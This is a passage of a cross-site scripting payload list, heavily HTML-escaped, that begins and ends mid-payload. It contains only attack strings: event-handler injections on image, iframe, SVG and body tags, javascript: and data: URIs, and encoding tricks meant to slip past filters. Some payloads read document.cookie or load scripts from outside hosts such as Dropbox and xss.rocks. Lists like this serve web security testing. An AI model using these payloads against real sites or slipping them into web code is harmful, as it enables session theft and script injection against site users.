onprogress=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onratechange=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onseeked=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onseeking=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onstalled=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onsuspend=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x ontimeupdate=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onvolumechange=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onwaiting=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x onshow=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;IMG SRC=x ontoggle=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;META onpaonpageonpagonpageonpageshowshoweshowshowgeshow=\\\&quot;alert(1)\\\&quot;;\\r\\n&lt;IMG SRC=x onload=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;\\r\\n&lt;INPUT TYPE=\\\&quot;BUTTON\\\&quot; action=\\\&quot;alert(\\\&#039;XSS\\\&#039;)\\\&quot;/&gt;\\r\\n\\\&quot;&gt;&lt;h1&gt;&lt;IFRAME SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;&lt;/IFRAME&gt;\\\&quot;&gt;123&lt;/h1&gt;\\r\\n\\\&quot;&gt;&lt;h1&gt;&lt;IFRAME SRC=# onmouseover=\\\&quot;alert(document.cookie)\\\&quot;&gt;&lt;/IFRAME&gt;123&lt;/h1&gt;\\r\\n&lt;IFRAME SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;&lt;/IFRAME&gt;\\r\\n&lt;IFRAME SRC=# onmouseover=\\\&quot;alert(document.cookie)\\\&quot;&gt;&lt;/IFRAME&gt;\\r\\n\\\&quot;&gt;&lt;h1&gt;&lt;IFRAME SRC=# onmouseover=\\\&quot;alert(document.cookie)\\\&quot;&gt;&lt;/IFRAME&gt;123&lt;/h1&gt;\\r\\n\\\&quot;&gt;&lt;/iframe&gt;&lt;script&gt;alert(`TEXT YOU WANT TO BE DISPLAYED`);&lt;/script&gt;&lt;iframe frameborder=\\\&quot;0%EF%BB%BF\\r\\n\\\&quot;&gt;&lt;h1&gt;&lt;IFRAME width=\\\&quot;420\\\&quot; height=\\\&quot;315\\\&quot; SRC=\\\&quot;http://www.youtube.com/embed/sxvccpasgTE\\\&quot; frameborder=\\\&quot;0\\\&quot; onmouseover=\\\&quot;alert(document.cookie)\\\&quot;&gt;&lt;/IFRAME&gt;123&lt;/h1&gt;\\r\\n\\\&quot;&gt;&lt;h1&gt;&lt;iframe width=\\\&quot;420\\\&quot; height=\\\&quot;315\\\&quot; src=\\\&quot;http://www.youtube.com/embed/sxvccpasgTE\\\&quot; frameborder=\\\&quot;0\\\&quot; allowfullscreen&gt;&lt;/iframe&gt;123&lt;/h1&gt;\\r\\n&gt;&lt;h1&gt;&lt;IFRAME width=\\\&quot;420\\\&quot; height=\\\&quot;315\\\&quot; frameborder=\\\&quot;0\\\&quot; onmouseover=\\\&quot;document.location.href=\\\&#039;https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr\\r\\ng\\\&#039;\\\&quot;&gt;&lt;/IFRAME&gt;Hover the cursor to the LEFT of this Message&lt;/h1&gt;&amp;ParamHeight=250\\r\\n&lt;IFRAME width=\\\&quot;420\\\&quot; height=\\\&quot;315\\\&quot; frameborder=\\\&quot;0\\\&quot; onload=\\\&quot;alert(document.cookie)\\\&quot;&gt;&lt;/IFRAME&gt;\\r\\n\\\&quot;&gt;&lt;h1&gt;&lt;IFRAME SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;&lt;/IFRAME&gt;\\\&quot;&gt;123&lt;/h1&gt;\\r\\n\\\&quot;&gt;&lt;h1&gt;&lt;IFRAME SRC=# onmouseover=\\\&quot;alert(document.cookie)\\\&quot;&gt;&lt;/IFRAME&gt;123&lt;/h1&gt;\\r\\n&lt;iframe src=http://xss.rocks/scriptlet.html &lt;\\r\\n&lt;IFRAME SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;&lt;/IFRAME&gt;\\r\\n&lt;IFRAME SRC=# onmouseover=\\\&quot;alert(document.cookie)\\\&quot;&gt;&lt;/IFRAME&gt;\\r\\n&lt;iframe src=\\\&quot;&amp;Tab;javascript:prompt(1)&amp;Tab;\\\&quot;&gt;\\r\\n&lt;svg&gt;&lt;style&gt;{font-family&amp;colon;\\\&#039;&lt;iframe/onload=confirm(1)&gt;\\\&#039;\\r\\n&lt;input/onmouseover=\\\&quot;javaSCRIPT&amp;colon;confirm&amp;lpar;1&amp;rpar;\\\&quot;\\r\\n&lt;sVg&gt;&lt;scRipt &gt;alert&amp;lpar;1&amp;rpar; {Opera}\\r\\n&lt;img/src=`` onerror=this.onerror=confirm(1) \\r\\n&lt;form&gt;&lt;isindex formaction=\\\&quot;javascript&amp;colon;confirm(1)\\\&quot;\\r\\n&lt;img src=``&amp;NewLine; onerror=alert(1)&amp;NewLine;\\r\\n&lt;script/&amp;Tab; src=\\\&#039;https://dl.dropbox.com/u/13018058/js.js\\\&#039; /&amp;Tab;&gt;&lt;/script&gt;\\r\\n&lt;ScRipT 5-0*3+9/3=&gt;prompt(1)&lt;/ScRipT giveanswerhere=?\\r\\n&lt;iframe/src=\\\&quot;data:text/html;&amp;Tab;base64&amp;Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\\\&quot;&gt;\\r\\n&lt;script /**/&gt;/**/alert(1)/**/&lt;/script /**/\\r\\n&amp;#34;&amp;#62;&lt;h1/onmouseover=\\\&#039;\\\\u0061lert(1)\\\&#039;&gt;\\r\\n&lt;iframe/src=\\\&quot;data:text/html,&lt;svg &amp;#111;&amp;#110;load=alert(1)&gt;\\\&quot;&gt;\\r\\n&lt;meta content=\\\&quot;&amp;NewLine; 1 &amp;NewLine;; JAVASCRIPT&amp;colon; alert(1)\\\&quot; http-equiv=\\\&quot;refresh\\\&quot;/&gt;\\r\\n&lt;svg&gt;&lt;script xlink:href=data&amp;colon;,window.open(\\\&#039;https://www.google.com/\\\&#039;) &lt;/script\\r\\n&lt;svg&gt;&lt;script x:href=\\\&#039;https://dl.dropbox.com/u/13018058/js.js\\\&#039; {Opera}\\r\\n&lt;meta http-equiv=\\\&quot;refresh\\\&quot; content=\\\&quot;0;url=javascript:confirm(1)\\\&quot;&gt;\\r\\n&lt;iframe src=javascript&amp;colon;alert&amp;lpar;document&amp;period;location&amp;rpar;&gt;\\r\\n&lt;form&gt;&lt;a href=\\\&quot;javascript:\\\\u0061lert&amp;#x28;1&amp;#x29;\\\&quot;&gt;X&lt;/script&gt;&lt;img/*/src=\\\&quot;worksinchrome&amp;colon;prompt&amp;#x28;1&amp;#x29;\\\&quot;/*/onerror=\\\&#039;eval(src)\\\&#039;&gt;\\r\\n&lt;img/&amp;#09;&amp;#10;&amp;#11; src=`~` onerror=prompt(1)&gt;\\r\\n&lt;form&gt;&lt;iframe &amp;#09;&amp;#10;&amp;#11; src=\\\&quot;javascript&amp;#58;alert(1)\\\&quot;&amp;#11;&amp;#10;&amp;#09;;&gt;\\r\\n&lt;a href=\\\&quot;data:application/x-x509-user-cert;&amp;NewLine;base64&amp;NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\\&quot;&amp;#09;&amp;#10;&amp;#11;&gt;X&lt;/a\\r\\nhttp://www.google&lt;script .com&gt;alert(document.location)&lt;/script\\r\\n&lt;a&amp;#32;href&amp;#61;&amp;#91;&amp;#00;&amp;#93;\\\&quot;&amp;#00; onmouseover=prompt&amp;#40;1&amp;#41;&amp;#47;&amp;#47;\\\&quot;&gt;XYZ&lt;/a\\r\\n&lt;img/src=@&amp;#32;&amp;#13; onerror = prompt(\\\&#039;&amp;#49;\\\&#039;)\\r\\n&lt;style/onload=prompt&amp;#40;\\\&#039;&amp;#88;&amp;#83;&amp;#83;\\\&#039;&amp;#41;\\r\\n&lt;script ^__^&gt;alert(String.fromCharCode(49))&lt;/script ^__^\\r\\n&lt;/style &amp;#32;&gt;&lt;script &amp;#32; :-(&gt;/**/alert(document.location)/**/&lt;/script &amp;#32; :-(\\r\\n&amp;#00;&lt;/form&gt;&lt;input type&amp;#61;\\\&quot;date\\\&quot; onfocus=\\\&quot;alert(1)\\\&quot;&gt;\\r\\n&lt;form&gt;&lt;textarea &amp;#13; onkeyup=\\\&#039;\\\\u0061\\\\u006C\\\\u0065\\\\u0072\\\\u0074&amp;#x28;1&amp;#x29;\\\&#039;&gt;\\r\\n&lt;script /***/&gt;/***/confirm(\\\&#039;\\\\uFF41\\\\uFF4C\\\\uFF45\\\\uFF52\\\\uFF54\\\\u1455\\\\uFF11\\\\u1450\\\&#039;)/***/&lt;/script /***/\\r\\n&lt;iframe srcdoc=\\\&#039;&amp;lt;body onload=prompt&amp;lpar;1&amp;rpar;&amp;gt;\\\&#039;&gt;\\r\\n&lt;a href=\\\&quot;javascript:void(0)\\\&quot; onmouseover=&amp;NewLine;javascript:alert(1)&amp;NewLine;&gt;X&lt;/a&gt;\\r\\n&lt;script ~~~&gt;alert(0%0)&lt;/script ~~~&gt;\\r\\n&lt;style/onload=&amp;lt;!--&amp;#09;&amp;gt;&amp;#10;alert&amp;#10;&amp;lpar;1&amp;rpar;&gt;\\r\\n&lt;///style///&gt;&lt;span %2F onmousemove=\\\&#039;alert&amp;lpar;1&amp;rpar;\\\&#039;&gt;SPAN\\r\\n&lt;img/src=\\\&#039;http://i.imgur.com/P8mL8.jpg\\\&#039; onmouseover=&amp;Tab;prompt(1)\\r\\n&amp;#34;&amp;#62;&lt;svg&gt;&lt;style&gt;{-o-link-source&amp;colon;\\\&#039;&lt;body/onload=confirm(1)&gt;\\\&#039;\\r\\n&amp;#13;&lt;blink/&amp;#13; onmouseover=pr&amp;#x6F;mp&amp;#116;(1)&gt;OnMouseOver {Firefox &amp; Opera}\\r\\n&lt;marquee onstart=\\\&#039;javascript:alert&amp;#x28;1&amp;#x29;\\\&#039;&gt;^__^\\r\\n&lt;div/style=\\\&quot;width:expression(confirm(1))\\\&quot;&gt;X&lt;/div&gt; {IE7}\\r\\n&lt;iframe// src=javaSCRIPT&amp;colon;alert(1)\\r\\n//&lt;form/action=javascript&amp;#x3A;alert&amp;lpar;document&amp;period;cookie&amp;rpar;&gt;&lt;input/type=\\\&#039;submit\\\&#039;&gt;//\\r\\n/*iframe/src*/&lt;iframe/src=\\\&quot;&lt;iframe/src=@\\\&quot;/onload=prompt(1) /*iframe/src*/&gt;\\r\\n//|\\\\\\\\ &lt;script //|\\\\\\\\ src=\\\&#039;https://dl.dropbox.com/u/13018058/js.js\\\&#039;&gt; //|\\\\\\\\ &lt;/script //|\\\\\\\\\\r\\n&lt;/font&gt;/&lt;svg&gt;&lt;style&gt;{src&amp;#x3A;\\\&#039;&lt;style/onload=this.onload=confirm(1)&gt;\\\&#039;&lt;/font&gt;/&lt;/style&gt;\\r\\n&lt;a/href=\\\&quot;javascript:&amp;#13; javascript:prompt(1)\\\&quot;&gt;&lt;input type=\\\&quot;X\\\&quot;&gt;\\r\\n&lt;/plaintext\\\\&gt;&lt;/|\\\\&gt;&lt;plaintext/onmouseover=prompt(1)\\r\\n&lt;/svg&gt;\\\&#039;\\\&#039;&lt;svg&gt;&lt;script \\\&#039;AQuickBrownFoxJumpsOverTheLazyDog\\\&#039;&gt;alert&amp;#x28;1&amp;#x29; {Opera}\\r\\n&lt;a href=\\\&quot;javascript&amp;colon;\\\\u0061&amp;#x6C;&amp;#101%72t&amp;lpar;1&amp;rpar;\\\&quot;&gt;&lt;button&gt;\\r\\n&lt;div onmouseover=\\\&#039;alert&amp;lpar;1&amp;rpar;\\\&#039;&gt;DIV&lt;/div&gt;\\r\\n&lt;iframe style=\\\&quot;position:absolute;top:0;left:0;width:100%;height:100%\\\&quot; onmouseover=\\\&quot;prompt(1)\\\&quot;&gt;\\r\\n&lt;a href=\\\&quot;jAvAsCrIpT&amp;colon;alert&amp;lpar;1&amp;rpar;\\\&quot;&gt;X&lt;/a&gt;\\r\\n&lt;embed src=\\\&quot;http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\&quot;&gt;\\r\\n&lt;object data=\\\&quot;http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\&quot;&gt;\\r\\n&lt;var onmouseover=\\\&quot;prompt(1)\\\&quot;&gt;On Mouse Over&lt;/var&gt;\\r\\n&lt;a href=javascript&amp;colon;alert&amp;lpar;document&amp;period;cookie&amp;rpar;&gt;Click Here&lt;/a&gt;\\r\\n&lt;img src=\\\&quot;/\\\&quot; =_=\\\&quot; title=\\\&quot;onerror=\\\&#039;prompt(1)\\\&#039;\\\&quot;&gt;\\r\\n&lt;%&lt;!--\\\&#039;%&gt;&lt;script&gt;alert(1);&lt;/script --&gt;\\r\\n&lt;script src=\\\&quot;data:text/javascript,alert(1)\\\&quot;&gt;&lt;/script&gt;\\r\\n&lt;iframe/src \\\\/\\\\/onload = prompt(1)\\r\\n&lt;iframe/onreadystatechange=alert(1)\\r\\n&lt;svg/onload=alert(1)\\r\\n&lt;input value=&lt;&gt;&lt;iframe/src=javascript:confirm(1)\\r\\n&lt;input type=\\\&quot;text\\\&quot; value=`` &lt;div/onmouseover=\\\&#039;alert(1)\\\&#039;&gt;X&lt;/div&gt;\\r\\nhttp://www.&lt;script&gt;alert(1)&lt;/script .com\\r\\n&lt;iframe src=j&amp;NewLine;&amp;Tab;a&amp;NewLine;&amp;Tab;&amp;Tab;v&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;a&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;s&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;c&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;r&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;i&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;p&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;t&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;colon;a&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;l&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;e&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;r&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;t&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;28&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;1&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;%29&gt;&lt;/iframe&gt;\\r\\n&lt;svg&gt;&lt;script ?&gt;alert(1)\\r\\n&lt;iframe src=j&amp;Tab;a&amp;Tab;v&amp;Tab;a&amp;Tab;s&amp;Tab;c&amp;Tab;r&amp;Tab;i&amp;Tab;p&amp;Tab;t&amp;Tab;:a&amp;Tab;l&amp;Tab;e&amp;Tab;r&amp;Tab;t&amp;Tab;%28&amp;Tab;1&amp;Tab;%29&gt;&lt;/iframe&gt;\\r\\n&lt;img src=`xx:xx`onerror=alert(1)&gt;\\r\\n&lt;object type=\\\&quot;text/x-scriptlet\\\&quot; data=\\\&quot;http://jsfiddle.net/XLE63/ \\\&quot;&gt;&lt;/object&gt;\\r\\n&lt;meta http-equiv=\\\&quot;refresh\\\&quot; content=\\\&quot;0;javascript&amp;colon;alert(1)\\\&quot;/&gt;\\r\\n&lt;math&gt;&lt;a xlink:href=\\\&quot;//jsfiddle.net/t846h/\\\&quot;&gt;click\\r\\n&lt;embed code=\\\&quot;http://businessinfo.co.uk/labs/xss/xss.swf\\\&quot; allowscriptaccess=always&gt;\\r\\n&lt;svg contentScriptType=text/vbs&gt;&lt;script&gt;MsgBox+1\\r\\n&lt;a href=\\\&quot;data:text/html;base64_,&lt;svg/onload=\\\\u0061&amp;#x6C;&amp;#101%72t(1)&gt;\\\&quot;&gt;X&lt;/a\\r\\n&lt;iframe/onreadystatechange=\\\\u0061\\\\u006C\\\\u0065\\\\u0072\\\\u0074(\\\&#039;\\\\u0061\\\&#039;) worksinIE&gt;\\r\\n&lt;script&gt;~\\\&#039;\\\\u0061\\\&#039; ; \\\\u0074\\\\u0068\\\\u0072\\\\u006F\\\\u0077 ~ \\\\u0074\\\\u0068\\\\u0069\\\\u0073. \\\\u0061\\\\u006C\\\\u0065\\\\u0072\\\\u0074(~\\\&#039;\\\\u0061\\\&#039;)&lt;/script U+\\r\\n&lt;script/src=\\\&quot;data&amp;colon;text%2Fj\\\\u0061v\\\\u0061script,\\\\u0061lert(\\\&#039;\\\\u0061\\\&#039;)\\\&quot;&gt;&lt;/script a=\\\\u0061 &amp; /=%2F\\r\\n&lt;script/src=data&amp;colon;text/j\\\\u0061v\\\\u0061&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116,\\\\u0061%6C%65%72%74(/XSS/)&gt;&lt;/script\\r\\n&lt;object data=javascript&amp;colon;\\\\u0061&amp;#x6C;&amp;#101%72t(1)&gt;\\r\\n&lt;script&gt;+-+-1-+-+alert(1)&lt;/script&gt;\\r\\n&lt;body/onload=&amp;lt;!--&amp;gt;&amp;#10alert(1)&gt;\\r\\n&lt;script itworksinallbrowsers&gt;/*&lt;script* */alert(1)&lt;/script\\r\\n&lt;img src ?itworksonchrome?\\\\/onerror = alert(1)\\r\\n&lt;svg&gt;&lt;script&gt;//&amp;NewLine;confirm(1);&lt;/script &lt;/svg&gt;\\r\\n&lt;svg&gt;&lt;script onlypossibleinopera:-)&gt; alert(1)\\r\\n&lt;a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&amp;#97v&amp;#97script&amp;#x3A;&amp;#97lert(1)&gt;ClickMe\\r\\n&lt;script x&gt; alert(1) &lt;/script 1=2\\r\\n&lt;div/onmouseover=\\\&#039;alert(1)\\\&#039;&gt; style=\\\&quot;x:\\\&quot;&gt;\\r\\n&lt;--`&lt;img/src=` onerror=alert(1)&gt; --!&gt;\\r\\n&lt;script/src=&amp;#100&amp;#97&amp;#116&amp;#97:text/&amp;#x6a&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x000070&amp;#x074,&amp;#x0061;&amp;#x06c;&amp;#x0065;&amp;#x00000072;&amp;#x00074;(1)&gt;&lt;/script&gt;\\r\\n&lt;div style=\\\&quot;position:absolute;top:0;left:0;width:100%;height:100%\\\&quot; onmouseover=\\\&quot;prompt(1)\\\&quot; onclick=\\\&quot;alert(1)\\\&quot;&gt;x&lt;/button&gt;\\r\\n\\\&quot;&gt;&lt;img src=x onerror=window.open(\\\&#039;https://www.google.com/\\\&#039;);&gt;\\r\\n&lt;form&gt;&lt;button formaction=javascript&amp;colon;alert(1)&gt;CLICKME\\r\\n&lt;math&gt;&lt;a xlink:href=\\\&quot;//jsfiddle.net/t846h/\\\&quot;&gt;click\\r\\n&lt;object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+&gt;&lt;/object&gt;\\r\\n&lt;iframe src=\\\&quot;data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E\\\&quot;&gt;&lt;/iframe&gt;\\r\\n&lt;a href=\\\&quot;data:text/html;blabla,&amp;#60&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#32&amp;#115&amp;#114&amp;#99&amp;#61&amp;#34&amp;#104&amp;#116&amp;#116&amp;#112&amp;#58&amp;#47&amp;#47&amp;#115&amp;#116&amp;#101&amp;#114&amp;#110&amp;#101&amp;#102&amp;#97&amp;#109&amp;#105&amp;#108&amp;#121&amp;#46&amp;#110&amp;#101&amp;#116&amp;#47&amp;#102&amp;#111&amp;#111&amp;#46&amp;#106&amp;#115&amp;#34&amp;#62&amp;#60&amp;#47&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#62&amp;#8203\\\&quot;&gt;Click Me&lt;/a&gt;\\r\\n&lt;script\\\\x20type=\\\&quot;text/javascript\\\&quot;&gt;javascript:alert(1);&lt;/script&gt;\\r\\n&lt;script\\\\x3Etype=\\\&quot;text/javascript\\\&quot;&gt;javascript:alert(1);&lt;/script&gt;\\r\\n&lt;script\\\\x0Dtype=\\\&quot;text/javascript\\\&quot;&gt;javascript:alert(1);&lt;/script&gt;\\r\\n&lt;script\\\\x09type=\\\&quot;text/javascript\\\&quot;&gt;javascript:alert(1);&lt;/script&gt;\\r\\n&lt;script\\\\x0Ctype=\\\&quot;text/javascript\\\&quot;&gt;javascript:alert(1);&lt;/script&gt;\\r\\n&lt;script\\\\x2Ftype=\\\&quot;text/javascript\\\&quot;&gt;javascript:alert(1);&lt;/script&gt;\\r\\n&lt;script\\\\x0Atype=\\\&quot;text/javascript\\\&quot;&gt;javascript:alert(1);&lt;/script&gt;\\r\\n\\\&#039;`\\\&quot;&gt;&lt;\\\\x3Cscript&gt;javascript:alert(1)&lt;/script&gt; \\r\\n\\\&#039;`\\\&quot;&gt;&lt;\\\\x00script&gt;javascript:alert(1)&lt;/script&gt;\\r\\n&lt;img src=1 href=1 onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;&lt;/img&gt;\\r\\n&lt;audio src=1 href=1 onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;&lt;/audio&gt;\\r\\n&lt;video src=1 href=1 onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;&lt;/video&gt;\\r\\n&lt;body src=1 href=1 onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;&lt;/body&gt;\\r\\n&lt;image src=1 href=1 onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;&lt;/image&gt;\\r\\n&lt;object src=1 href=1 onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;&lt;/object&gt;\\r\\n&lt;script src=1 href=1 onerror=\\\&quot;javascript:alert(1)\\\&quot;&gt;&lt;/script&gt;\\r\\n&lt;svg onResize svg onResize=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/svg onResize&gt;\\r\\n&lt;title onPropertyChange title onPropertyChange=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/title onPropertyChange&gt;\\r\\n&lt;iframe onLoad iframe onLoad=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/iframe onLoad&gt;\\r\\n&lt;body onMouseEnter body onMouseEnter=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onMouseEnter&gt;\\r\\n&lt;body onFocus body onFocus=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onFocus&gt;\\r\\n&lt;frameset onScroll frameset onScroll=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/frameset onScroll&gt;\\r\\n&lt;script onReadyStateChange script onReadyStateChange=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/script onReadyStateChange&gt;\\r\\n&lt;html onMouseUp html onMouseUp=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/html onMouseUp&gt;\\r\\n&lt;body onPropertyChange body onPropertyChange=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onPropertyChange&gt;\\r\\n&lt;svg onLoad svg onLoad=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/svg onLoad&gt;\\r\\n&lt;body onPageHide body onPageHide=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onPageHide&gt;\\r\\n&lt;body onMouseOver body onMouseOver=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onMouseOver&gt;\\r\\n&lt;body onUnload body onUnload=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onUnload&gt;\\r\\n&lt;body onLoad body onLoad=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onLoad&gt;\\r\\n&lt;bgsound onPropertyChange bgsound onPropertyChange=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/bgsound onPropertyChange&gt;\\r\\n&lt;html onMouseLeave html onMouseLeave=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/html onMouseLeave&gt;\\r\\n&lt;html onMouseWheel html onMouseWheel=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/html onMouseWheel&gt;\\r\\n&lt;style onLoad style onLoad=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/style onLoad&gt;\\r\\n&lt;iframe onReadyStateChange iframe onReadyStateChange=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/iframe onReadyStateChange&gt;\\r\\n&lt;body onPageShow body onPageShow=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onPageShow&gt;\\r\\n&lt;style onReadyStateChange style onReadyStateChange=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/style onReadyStateChange&gt;\\r\\n&lt;frameset onFocus frameset onFocus=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/frameset onFocus&gt;\\r\\n&lt;applet onError applet onError=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/applet onError&gt;\\r\\n&lt;marquee onStart marquee onStart=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/marquee onStart&gt;\\r\\n&lt;script onLoad script onLoad=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/script onLoad&gt;\\r\\n&lt;html onMouseOver html onMouseOver=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/html onMouseOver&gt;\\r\\n&lt;html onMouseEnter html onMouseEnter=\\\&quot;javascript:parent.javascript:alert(1)\\\&quot;&gt;&lt;/html onMouseEnter&gt;\\r\\n&lt;body onBeforeUnload body onBeforeUnload=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onBeforeUnload&gt;\\r\\n&lt;html onMouseDown html onMouseDown=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/html onMouseDown&gt;\\r\\n&lt;marquee onScroll marquee onScroll=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/marquee onScroll&gt;\\r\\n&lt;xml onPropertyChange xml onPropertyChange=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/xml onPropertyChange&gt;\\r\\n&lt;frameset onBlur frameset onBlur=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/frameset onBlur&gt;\\r\\n&lt;applet onReadyStateChange applet onReadyStateChange=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/applet onReadyStateChange&gt;\\r\\n&lt;svg onUnload svg onUnload=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/svg onUnload&gt;\\r\\n&lt;html onMouseOut html onMouseOut=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/html onMouseOut&gt;\\r\\n&lt;body onMouseMove body onMouseMove=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onMouseMove&gt;\\r\\n&lt;body onResize body onResize=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onResize&gt;\\r\\n&lt;object onError object 